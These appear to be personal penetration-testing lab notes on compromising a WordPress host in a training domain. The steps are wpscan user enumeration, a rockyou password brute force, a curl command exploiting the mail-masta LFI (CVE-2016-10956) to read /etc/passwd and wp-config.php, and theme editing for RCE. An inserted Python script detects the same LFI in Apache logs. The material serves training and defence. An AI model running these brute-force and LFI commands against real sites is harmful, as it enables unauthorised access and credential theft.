## `ir.inlanefreight.local`
### enum
- this is a wordpress page ![[images/Pasted image 20260628152303.png]]
- `/wp-admin` ![[images/Pasted image 20260628152353.png]]
- `admin:admin` doesn't work
- forgot password could work with imap/pop3 ![[images/Pasted image 20260628152503.png]]
### `wpscan`
- run `wpscan` enum with output file and aggressive detection mode
```bash
sudo wpscan --url ir.inlanefreight.local -e -o ir.wpscan -v --detection-mode aggressive
```
- running version 6.0 ![[images/Pasted image 20260628200730.png]]
- several users found ![[images/Pasted image 20260628200748.png]]
- try brute force
- we got a hit for `ilfreightwp`
```bash
sudo wpscan --url ir.inlanefreight.local -e u --passwords /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt
```
## access dashboard as `ilfreightwp`
- we are in as an administrator ![[images/Pasted image 20260628212725.png]]
- plugins ![[images/Pasted image 20260628212526.png]]
- mail masta ver 1.0 is susceptible to:
    - CVE-2016-10956 - LFI
        - grab `wp-config.php`
    - CVE-2017-6095, CVE-2017-6097, CVE-2017-6572 - SQLi
- themes ![[images/Pasted image 20260628212606.png]]
- users ![[images/Pasted image 20260628212544.png]]
### `mail-masta` LFI
- try to `curl [..] /etc/passwd`
- only `root` has a login shell?
```bash
curl -s 'http://ir.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd'
```
![[images/Pasted image 20260629204822.png]]
- try to curl apache logs ![[images/Pasted image 20260629205317.png]]
- try to curl `wp-config.php` ![[images/Pasted image 20260629210326.png]]
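
Detection side of the requests above, as an added example (not part of the original notes): a scan of Apache combined-format access logs for mail-masta requests whose `pl` parameter looks like a file path. The log lines are constructed samples, and the heuristics in `suspicious_pl` are assumptions to tune per site.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PREFIX = "/wp-content/plugins/mail-masta/"

# Constructed sample lines (documentation IP ranges), not taken from the lab host.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Jun/2026:20:48:22 +0000] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1420 "-" "curl/8.5.0"',
    '203.0.113.7 - - [29/Jun/2026:21:03:26 +0000] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3100 "-" "curl/8.5.0"',
    '198.51.100.4 - - [29/Jun/2026:21:05:00 +0000] "GET /wp-content/plugins/mail-masta/readme.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [29/Jun/2026:21:05:02 +0000] "GET /index.php?pl=/about HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def suspicious_pl(value):
    """Assumed heuristics: absolute path, upward traversal, URL scheme, or wp-config."""
    v = value.lower()
    return v.startswith("/") or ".." in v or "://" in v or "wp-config" in v

def find_lfi_attempts(lines):
    """Return one record per suspicious `pl` value sent to the mail-masta plugin."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m["target"])
        if not url.path.startswith(PLUGIN_PREFIX):
            continue  # `pl` on other paths is out of scope here
        # parse_qs percent-decodes once, so %2F-encoded paths are compared decoded
        for value in parse_qs(url.query).get("pl", []):
            if suspicious_pl(value):
                hits.append({"ip": m["ip"], "path": url.path,
                             "pl": value, "status": int(m["status"])})
    return hits

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 status on a hit means the plugin answered the request, so those records are the ones to triage first.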
### edit themes
- edit inactive twenty-twenty theme ![[images/Pasted image 20260629210049.png]]
- we have RCE as `www-data` ![[images/Pasted image 20260629210143.png]]
- another flag ![[images/Pasted image 20260629210224.png]]
- confirmed that the vhost is running in a docker container ![[images/Pasted image 20260629212828.png]]
- `env` > password for wordpress_db ![[images/Pasted image 20260629212748.png]]